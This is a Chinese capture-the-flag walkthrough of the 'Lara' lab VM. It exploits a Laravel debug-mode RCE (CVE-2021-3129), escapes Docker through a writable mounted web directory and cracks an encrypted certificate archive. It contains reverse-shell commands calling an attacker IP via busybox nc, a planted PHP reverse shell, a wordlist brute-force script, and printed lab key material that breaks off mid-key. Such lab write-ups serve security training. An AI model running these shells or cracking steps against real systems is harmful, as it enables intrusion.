Lara

靶机说明

  • QQ群:660930334

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:52 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00032s latency).
MAC Address: 08:00:27:AE:80:30 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.32
Host is up (0.00062s latency).
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

靶机IP:192.168.2.32

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.32                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:52 CST
Nmap scan report for 192.168.2.32
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.57 seconds

开放端口:22、80、8000

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8000 192.168.2.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:53 CST
Nmap scan report for 192.168.2.32
Host is up (0.0011s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http    nginx
|_http-title: Ping Utility
8000/tcp open  http    (PHP 7.3.31)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Mon, 05 Jan 2026 06:53:59 GMT
|     Connection: close
|     X-Powered-By: PHP/7.3.31
|     Cache-Control: no-cache, private
|     date: Mon, 05 Jan 2026 06:53:59 GMT
|     Content-type: text/html; charset=UTF-8
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Not Found</title>
|     <!-- Fonts -->
|     <link rel="preconnect" href="https://fonts.gstatic.com">
|     <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
|     <style>
|     normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Mon, 05 Jan 2026 06:53:59 GMT
|     Connection: close
|     X-Powered-By: PHP/7.3.31
|     Content-Type: text/html; charset=UTF-8
|     Cache-Control: private, must-revalidate
|     Date: Mon, 05 Jan 2026 06:53:59 GMT
|     pragma: no-cache
|     expires: -1
|     Set-Cookie: XSRF-TOKEN=eyJpdiI6IlhCV29pREd4YUsyQ2R3TG4wQUVzK2c9PSIsInZhbHVlIjoiWFdBeEJIYTl5VWpSRktLSjlwL0RMeHBVdmVXYjc2MHp0MWhaeDFncU45UTQ4Z0t5TWZtRDJEM25DU0ZnTUxLUWFZb3l5cjJrVGJMeHV5ZGhHY0p1Mm95aGhpSTdGQWdVNnhjQlQ1L0creTRZY1cyamdsQ3dpUkdZVVM1NnB5dnkiLCJtYWMiOiJlOWYzZTE3OWQzYjUzZWFiY2Q4NDVkYTFhNjQzZDZmZDU1OGZjMzMyM2RjMzgwYzQ3NzY4ZmQyNjM5YzIwODRiIiwidGFnIjoiIn0%3D; expires=Mon, 05-Jan-2026 08:53:59 GMT; Max-Age=7200; path=/; samesite=lax
|_    Set-Cookie: laravel_session=eyJpdiI6ImRkS1FjcUFNQm9rTk5hc2Fab3B4UkE9PSIsInZhbHVlIjoiSXk3ekJqbkFOTTZFVGdCL2hCQm9ZdDBYZ3BFN2g2L2tzSkJ4bElOOHhybWplb3V0ODFJK1hPUFA5bTFEVjErTzl2RFFwdFFGYjJ1MFR0V1VWckRnTmhpQnNqcitxSU
|_http-title: Laravel
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.94SVN%I=7%D=1/5%Time=695B6009%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,48C0,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x2005\x20Jan\x
SF:202026\x2006:53:59\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20P
SF:HP/7\.3\.31\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nCache-Co
SF:ntrol:\x20private,\x20must-revalidate\r\nDate:\x20Mon,\x2005\x20Jan\x20
SF:2026\x2006:53:59\x20GMT\r\npragma:\x20no-cache\r\nexpires:\x20-1\r\nSet
SF:-Cookie:\x20XSRF-TOKEN=eyJpdiI6IlhCV29pREd4YUsyQ2R3TG4wQUVzK2c9PSIsInZh
SF:bHVlIjoiWFdBeEJIYTl5VWpSRktLSjlwL0RMeHBVdmVXYjc2MHp0MWhaeDFncU45UTQ4Z0t
SF:5TWZtRDJEM25DU0ZnTUxLUWFZb3l5cjJrVGJMeHV5ZGhHY0p1Mm95aGhpSTdGQWdVNnhjQl
SF:Q1L0creTRZY1cyamdsQ3dpUkdZVVM1NnB5dnkiLCJtYWMiOiJlOWYzZTE3OWQzYjUzZWFiY
SF:2Q4NDVkYTFhNjQzZDZmZDU1OGZjMzMyM2RjMzgwYzQ3NzY4ZmQyNjM5YzIwODRiIiwidGFn
SF:IjoiIn0%3D;\x20expires=Mon,\x2005-Jan-2026\x2008:53:59\x20GMT;\x20Max-A
SF:ge=7200;\x20path=/;\x20samesite=lax\r\nSet-Cookie:\x20laravel_session=e
SF:yJpdiI6ImRkS1FjcUFNQm9rTk5hc2Fab3B4UkE9PSIsInZhbHVlIjoiSXk3ekJqbkFOTTZF
SF:VGdCL2hCQm9ZdDBYZ3BFN2g2L2tzSkJ4bElOOHhybWplb3V0ODFJK1hPUFA5bTFEVjErTzl
SF:2RFFwdFFGYjJ1MFR0V1VWckRnTmhpQnNqcitxSU")%r(FourOhFourRequest,1AAC,"HTT
SF:P/1\.0\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x2005\x20Jan\x202026\x20
SF:06:53:59\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.3\.3
SF:1\r\nCache-Control:\x20no-cache,\x20private\r\ndate:\x20Mon,\x2005\x20J
SF:an\x202026\x2006:53:59\x20GMT\r\nContent-type:\x20text/html;\x20charset
SF:=UTF-8\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x
SF:20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\
SF:"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<title>Not\x20Found</title>\n\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:!--\x20Fonts\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"pre
SF:connect\"\x20href=\"https://fonts\.gstatic\.com\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<link\x20href=\"https://fonts\.googleapis\.com/css2\?famil
SF:y=Nunito&display=swap\"\x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<style>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/\*
SF:!\x20normalize\.css\x20v8\.0\.1\x20\|\x20MIT\x20License\x20\|\x20github
SF:\.com/necolas/normalize\.css\x20\*/html{line-height:1\.15;-webkit-text-
SF:size-adjust:100%}body{margin:0}a{background-color:transparent}code{font
SF:-family:monospace,monospace;font-size:1em}\[hidden\]{display:none}html{
SF:font-family:system-ui,-app");
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.32                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:54 CST
Nmap scan report for 192.168.2.32
Host is up (0.00095s latency).
All 100 scanned ports on 192.168.2.32 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 99.03 seconds

二、WEB渗透

1、80端口

访问80端口,发现是一个PING测试工具

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[/miaosec]
└─# dirsearch -u "http://192.168.2.32"     
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miaosec/reports/http_192.168.2.32/_26-01-07_15-41-19.txt

Target: http://192.168.2.32/

[15:41:19] Starting: 
[15:41:22] 403 -  548B  - /.ht_wsr.txt
[15:41:22] 403 -  548B  - /.htaccess.bak1
[15:41:22] 403 -  548B  - /.htaccess.orig
[15:41:22] 403 -  548B  - /.htaccess.sample
[15:41:22] 403 -  548B  - /.htaccess.save
[15:41:22] 403 -  548B  - /.htaccessBAK
[15:41:22] 403 -  548B  - /.htaccess_orig
[15:41:22] 403 -  548B  - /.htaccessOLD
[15:41:22] 403 -  548B  - /.htaccess_sc
[15:41:22] 403 -  548B  - /.htaccessOLD2
[15:41:22] 403 -  548B  - /.htaccess_extra
[15:41:22] 403 -  548B  - /.htm
[15:41:22] 403 -  548B  - /.html
[15:41:22] 403 -  548B  - /.htpasswd_test
[15:41:22] 403 -  548B  - /.httr-oauth
[15:41:22] 403 -  548B  - /.htpasswds

Task Completed

无任何东西

2、8000-Laravel

访问8080端口,发现是一个Laravelcms,版本为8.83.29

直接使用TScan进行漏洞扫描

开启了Debug模式,搜索发现一个RCE漏洞CVE-2021-3129

使用的EXP:CVE-2021-3129

反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(.venv)─(root㉿kali)-[/tmp/CVE-2021-3129]
└─# python3 CVE-2021-3129.py --host http://192.168.2.32:8000 --force --exec 'busybox nc 192.168.2.4 4444 -e /bin/sh' --chain Laravel/RCE12
  _____   _____   ___ __ ___ _    _____ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_,  /
 \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/ 
 https://github.com/joshuavanderpoll/CVE-2021-3129
 Using PHPGGC: https://github.com/ambionics/phpggc

[@] Starting the exploit on "http://192.168.2.32:8000/"...
[@] Testing vulnerable URL "http://192.168.2.32:8000/_ignition/execute-solution"...
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/src/laravel/storage/logs/laravel.log".
[•] Laravel version found: "8.83.29".
[@] Clearing Laravel logs...
[@] Executing command "busybox nc 192.168.2.4 4444 -e /bin/sh"...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain Laravel/RCE12 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.

获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.32] 45673
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

三、权限提升

查看发现,处于docker容器中

1
2
3
4
5
6
7
8
ls -la /
total 76
drwxr-xr-x    1 root     root          4096 Dec 27 14:52 .
drwxr-xr-x    1 root     root          4096 Dec 27 14:52 ..
-rwxr-xr-x    1 root     root             0 Dec 27 14:52 .dockerenv
drwxr-xr-x    1 root     root          4096 Oct 15  2021 bin
drwxr-xr-x    5 root     root           320 Jan  7 07:39 dev
.....

1、docker挂载逃逸

查看挂载点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
cat /proc/mounts
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/HXF4EH4QOP3PFP3WTXAFCUYMBI:/var/lib/docker/overlay2/l/BARM5SFR2TDZXCWIKPJVP2J54E:/var/lib/docker/overlay2/l/WBRDWAEECENUU744T54A2LXZS2:/var/lib/docker/overlay2/l/NYXBJ27GGJQWKCMYO6UJ4PRDD7:/var/lib/docker/overlay2/l/2CGOJZXYDP7ZY76NGXFCI5O77M:/var/lib/docker/overlay2/l/IB3IOPHPLAJEAHVWBQ5EYWLJJB:/var/lib/docker/overlay2/l/TNVVYE4RJB4773NBEHZQJWHY5E:/var/lib/docker/overlay2/l/IOUASKU43UPNCLUUQ5KR23KJZY:/var/lib/docker/overlay2/l/YQBYPMD2COWEBNNFP3NG4MISG4:/var/lib/docker/overlay2/l/DWNKLEE43NWMUACFFMR4P4WQAQ:/var/lib/docker/overlay2/l/JPKS6LRXO6GCPCLFSECB5M7YXM:/var/lib/docker/overlay2/l/PLZ3W24FVFNOEIBO3NEBTHLUQC:/var/lib/docker/overlay2/l/YCCIGEY34PYNHMPJCSJZJTX7KA:/var/lib/docker/overlay2/l/BYIG4G4KUGNW7GQJNXR6VFL5EZ,upperdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/diff,workdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/work 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0
/dev/sda3 /etc/resolv.conf ext4 rw,relatime 0 0
/dev/sda3 /etc/hostname ext4 rw,relatime 0 0
/dev/sda3 /etc/hosts ext4 rw,relatime 0 0
/dev/sda3 /var/www/html ext4 rw,relatime 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
tmpfs /proc/asound tmpfs ro,relatime,inode64 0 0
tmpfs /proc/acpi tmpfs ro,relatime,inode64 0 0
tmpfs /proc/interrupts tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/latency_stats tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/scsi tmpfs ro,relatime,inode64 0 0
tmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0

发现宿主机的/var/www/html挂载到/dev/sda3,并且具有rw权限,对应80端口

1
2
3
4
5
6
7
8
9
cd /var/www/html
ls -la
total 16
drwxr-xr-x    2 root     root          4096 Dec 28 10:31 .
drwxr-xr-x    3 root     root          4096 Aug 27  2021 ..
-rw-r--r--    1 root     root            19 Dec 29 15:18 a.php
-rw-r--r--    1 root     root          3617 Dec 27 14:55 index.php
cat a.php
<?php phpinfo();?>

反弹shell即可

1
2
3
4
cat re.php
<?php
  exec("busybox nc 192.168.2.4 4444 -e /bin/sh");
?>

获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444                                                                       
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.32] 37271
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

2、dockerapi逃逸

/home/alice/ilovealice中发现目录...

1
2
cat ...
openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc  -iter 10000 -pbkdf2

enc加密后变成了certs.tar.gz

1
2
3
4
5
6
7
cd .docker
ls -la
total 20
drwxr-sr-x    3 alice    alice         4096 Dec 30 00:31 .
drwxr-sr-x    4 alice    alice         4096 Dec 30 00:38 ..
-rw-r--r--    1 root     alice         5248 Dec 30 00:28 .enc
drwx------    2 root     root          4096 Dec 30 00:22 certs

.enc复制到web目录下,进行下载

1
2
chmod 777 rev.txt
cat /home/alice/.docker/.enc > rev.txt

丢给ai写一个爆破脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/bin/bash

# Usage check
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <encrypted_file.tar.gz.enc> <wordlist.txt>"
    exit 1
fi

ENC_FILE="$1"
WORDLIST="$2"

if [ ! -f "$ENC_FILE" ]; then
    echo "Error: Encrypted file '$ENC_FILE' not found."
    exit 1
fi

if [ ! -f "$WORDLIST" ]; then
    echo "Error: Wordlist '$WORDLIST' not found."
    exit 1
fi

echo "[*] Starting brute-force on '$ENC_FILE' using '$WORDLIST'..."

# Create a temporary file for decrypted output
TMP_DEC="/tmp/decrypted_$$"

# Counter
COUNT=0

while IFS= read -r PASS || [ -n "$PASS" ]; do
    ((COUNT++))

    # Skip empty lines
    if [ -z "$PASS" ]; then
        continue
    fi

    # Try to decrypt with current password
    # -d: decrypt
    # -pbkdf2 -iter 10000: match your encryption settings
    # -pass pass:"$PASS": provide password directly (avoid stdin)
    # Redirect stderr to /dev/null to suppress "bad decrypt" errors
    if openssl enc -d -aes-256-cbc \
        -in "$ENC_FILE" \
        -out "$TMP_DEC" \
        -pbkdf2 -iter 10000 \
        -pass pass:"$PASS" 2>/dev/null; then

        # Check if output is valid gzip (magic bytes: 1f 8b)
        if [ -f "$TMP_DEC" ] && head -c 2 "$TMP_DEC" | hexdump -C | grep -q "1f 8b"; then
            echo ""
            echo "[+] SUCCESS! Password found: $PASS"
            mv "$TMP_DEC" "./decrypted.tar.gz"
            echo "[+] Decrypted file saved as 'decrypted.tar.gz'"
            exit 0
        else
            # Decryption succeeded but not valid gzip? (unlikely, but possible)
            rm -f "$TMP_DEC"
        fi
    fi

    # Progress every 1000 attempts
    if [ $((COUNT % 1000)) -eq 0 ]; then
        echo "[*] Tried $COUNT passwords..."
    fi

done < "$WORDLIST"

rm -f "$TMP_DEC"
echo "[-] Password not found in wordlist."
exit 1

成功解密出密码:060606

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/tmp]
└─# ./bp.sh enc /usr/share/wordlists/rockyou.txt
[*] Starting brute-force on 'enc' using '/usr/share/wordlists/rockyou.txt'...
[*] Tried 1000 passwords...
[*] Tried 2000 passwords...

[+] SUCCESS! Password found: 060606
[+] Decrypted file saved as 'decrypted.tar.gz'

certs.tar.gz解压后得到的是证书文件和密钥文件,可以用来通过 docker 的 Authz-broker认证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
┌──(root㉿kali)-[/tmp/certs]
└─# cat ca.pem                                        
-----BEGIN CERTIFICATE-----
MIIFCTCCAvGgAwIBAgIUYN6pFeK0ToJUOXBJLWs1F/sxuPIwDQYJKoZIhvcNAQEL
BQAwFDESMBAGA1UEAwwJZG9ja2VyLWNhMB4XDTI1MTIyNzE1MDQyNloXDTM1MTIy
NTE1MDQyNlowFDESMBAGA1UEAwwJZG9ja2VyLWNhMIICIjANBgkqhkiG9w0BAQEF
AAOCAg8AMIICCgKCAgEAznSWI7sJA3p/7Fe/oLC71w0hatV15PoG6/eKg1Dbhuy2
ulUdTxb3PGlECPl0yjBsFqVbroJ3XB5P9GFxRrt05ytTmHOz726l9G9GslwNcIK3
CrI+GDXAuTnZFBpvZOBbNDHmIunl5gJvTHYovE2yGJezdt/utS1EyOAKbajE4RaN
pkYP9vTwSf0PLX/NQ31JiJyELQajXGqNxQllwWcXUHElFeA4GMRQrV8ZnPI2wFw7
Hjcdcwo8csHpSLSsYs8SlWy+vGjwlbPk1F4ueRcp69bLR/IwBLPSwSSAYl9ro8s2
0NE9dLKCr6a5f6M5TMGXqne/mlqEUCqefJodVubaNqgPrNri0A4c2vp01s3SoYA9
RukWGuVTWz9zFN6G4AZUTl9Sy6ddJ+fU2vfTDd4dQ9rkYvIR870I2FqL1Ohcg0Qu
Q5NtWFrjQkhySoRHuqwvKdvKVLuKp1xDEu6vu3Hu8r5BJLt0Q6hxG98IEEBkvw1b
Sv/Y5gH0Mp/v8bqkmVGDJzXbaKOkMweEYmI7Ono8lH1aBjxIEM+1tgfgICrr+DmY
xeS89b9XqVAGCE+8C4gKFJXNwSVdr6xBfVa2AnSZ4jvEkvSoHVLrqfMbomcj6nKD
x/pyj1J6BZfYEfjJ07+CgC0Bd7I5E+hi7o4bseRM5rCO9PClpIGeD75e1Ip0RIUC
AwEAAaNTMFEwHQYDVR0OBBYEFIMyGXZCe31oC+wEtq4/bP3xdjYEMB8GA1UdIwQY
MBaAFIMyGXZCe31oC+wEtq4/bP3xdjYEMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZI
hvcNAQELBQADggIBAMXNCaAZiFGKKUIcvLvAjoQYyWhqhrRL0PQwBJI+aV55cxeo
2KC23g/r9CJfOqLGdjLRU1vAWT+yCHzdKIUOelWjpiENruQ9+ZeLGFA0enZmigq0
MUSrzLCXTQdvyL8OMFyxwQCIyNPmriLx/63a2XX4ka/c72TzYFJ5VtmKrzFc1CmK
Lso19v0Ae1DBTUjefVB3ZFMGbpVCZ3z8SiWg8FaWg90F5/KLHm8tksTF0DbuAIG8
NZ8R8Epbem3eqaT3UWS1WsVdpAJwicJxmOGGj3rAVAp5k2WfJ/Myka5qwgcgScoB
ncECvWqt6jMg6t2MKtrD7UTCAL9yC43nUxovtLGSMaJMcjb/uDPcwrqN7IX1Qydr
huAsy4aLqm833JKks37qEdV5hexwti3FtYfsvg/GfzumzthAwVMf1MNdLTxfZhYu
rEhQ+DnZEk4TQm8aOLJjTNJr8NddwqNVz8GX27yTtd78s79SCWEKOXO7lQnH1HDZ
UjHrZ0xK5le8TW+bjDD9/w6XAcynyvHQVFXVd2YsvZoriuCntn3NimDUtjP6KqJn
Yjb3ItHl1bcgxh9m6BB9TvboQbC981VN+3+5tSDcZpJMYbvbb9+ZaxNfqCNFf4ua
C+8NWsoMVBIwHGeR1/5wrS1CU5J/n2BbHaNnefLpmMyXfc9xe6j6hbtdzTy/
-----END CERTIFICATE-----


┌──(root㉿kali)-[/tmp/certs]
└─# cat client-cert.pem 
-----BEGIN CERTIFICATE-----
MIIE/DCCAuSgAwIBAgIUaj+sVaQZlFfb+PTf3BjS8CA8LSMwDQYJKoZIhvcNAQEL
BQAwFDESMBAGA1UEAwwJZG9ja2VyLWNhMB4XDTI1MTIyNzE1MDQyN1oXDTM1MTIy
NTE1MDQyN1owGDEWMBQGA1UEAwwNZG9ja2VyLWNsaWVudDCCAiIwDQYJKoZIhvcN
AQEBBQADggIPADCCAgoCggIBALvnYo+n1KxS3rljdYYlxRFi+BEZ2jVpdew1/vw0
hALe71NHDSRBWL5mOgtByiKsBJzWSMNb6OdVaUWWcnTG0LaDcyt1Gx9nwFSKtMqT
yEkblD5lDHF8m0MJPA9SLijspcVUDvF+qTkW5IkUVDXud0Hznqbq9kN/eOfHaqTw
AigSSynLp60JxYuMD3mpPJPwBafaFu3GvdLAQLF16gbcE4D+2g/+ojrCRAQTam6B
SDEnPjs7qEft/DYXNSEfX1bLsJi9M/QsW65p7dND+9897uhXKj4E4s5Zq4G8PiHu
WRakm2kF9x1t/3hPU6m3tF0ZvZZToZ0Vc7KweWsM538Heu4JG5L+JF/PPVBxZnv5
cW4U779oJgyrU9ZhYAR3TF+cyJXT4nrO7+iFobU0J5EDVnZfh4Dn/maaJUA45OKN
stvNj3R5lT+31SJfQCYRG/gQcPWDNYhl4wrN2OioN0Xx61EdFEcaHfElDfJfq9v/
LC4HfTtxiKZyJmGCrkTG3zg8TQ4TrvElxaepeI+N2WhL4Q92+fiOR2DUUH9Z1nnQ
fkyECS7Ct+xx20np+UgiID+UJP7zGA8qOXoWEIpubLF5yAVRy+tyviJP1tzwAQFC
qqd8g4PCr0fbbOPD5U4FXVianXyVn34r6zrTOqTh0cAaE0qlzfFV2GTQRolc0I6t
pXzBAgMBAAGjQjBAMB0GA1UdDgQWBBR8MbBz6oZ3TAxXNE4w8Sg19c7kAzAfBgNV
HSMEGDAWgBSDMhl2Qnt9aAvsBLauP2z98XY2BDANBgkqhkiG9w0BAQsFAAOCAgEA
FVIp82ahPbY/lIcWZkPaMiFtogpWTHuQfzPil+Pn/oN7kDC86w7M2QAwBEmCi267
4QIxOvg7STkwCjwH93+Gwv205mpfWTo9Fhko+Yg/0dCFn+QL7PH5iW/a67+jwLmj
6R+0fRcwCyAoBEmqblIzW/Fnwy/BT2J9EyPlCzYMmSBSCMu4J1Tged1inqOCcCSW
LGEfWKaZ6lXCmn9h0VPLVYc4OzR9s2lMnS27VVX5pTYVSGfVElMpMHBN6B1qptuy
Pdml5qYEkdvDEj8KtPM2ccWODyqBVzc1z4xblAG8xKdAcj1azxzBFtLfBHyndzYz
T+OQ6eHcgCeeQOVj+jDRXcRgYD+uZml7ZBZOa2JCDYvPFQ+tqUMButZk6PTIDW5c
W1rqClbg1IVZQrnZoHHA2awmQmEcPMYvw3E9geJ5ZBv2hxQtiDj/P5f0TLKKl5Ob
kn3iYZvn45ItN3MoxyDLflZ8weECmBDHr2ivoGjy6en+PMDv2ZcDzAM3sNS5vHdF
hgrkEBaImha6lA+r5fX8Hoy9HNLiEs53/0J2Rc3NmGlfPvSEf9Nt2cFFBK6OicrJ
7l2oNyCGPqffQkFGVvJhoxdaJ9dn+2co14U1HNMvNVQdBSCaMiQdFJ7F+VH9QoZO
GlZz5PXOFOMy9yN2E2GfTRlzyh5TuCtym9tcCU3tfqA=
-----END CERTIFICATE-----


┌──(root㉿kali)-[/tmp/certs]
└─# cat client-key.pem 
-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQC752KPp9SsUt65
Y3WGJcURYvgRGdo1aXXsNf78NIQC3u9TRw0kQVi+ZjoLQcoirASc1kjDW+jnVWlF
lnJ0xtC2g3MrdRsfZ8BUirTKk8hJG5Q+ZQxxfJtDCTwPUi4o7KXFVA7xfqk5FuSJ
FFQ17ndB856m6vZDf3jnx2qk8AIoEkspy6etCcWLjA95qTyT8AWn2hbtxr3SwECx
deoG3BOA/toP/qI6wkQEE2pugUgxJz47O6hH7fw2FzUhH19Wy7CYvTP0LFuuae3T
Q/vfPe7oVyo+BOLOWauBvD4h7lkWpJtpBfcdbf94T1Opt7RdGb2WU6GdFXOysHlr
DOd/B3ruCRuS/iRfzz1QcWZ7+XFuFO+/aCYMq1PWYWAEd0xfnMiV0+J6zu/ohaG1
NCeRA1Z2X4eA5/5mmiVAOOTijbLbzY90eZU/t9UiX0AmERv4EHD1gzWIZeMKzdjo
qDdF8etRHRRHGh3xJQ3yX6vb/ywuB307cYimciZhgq5Ext84PE0OE67xJcWnqXiP
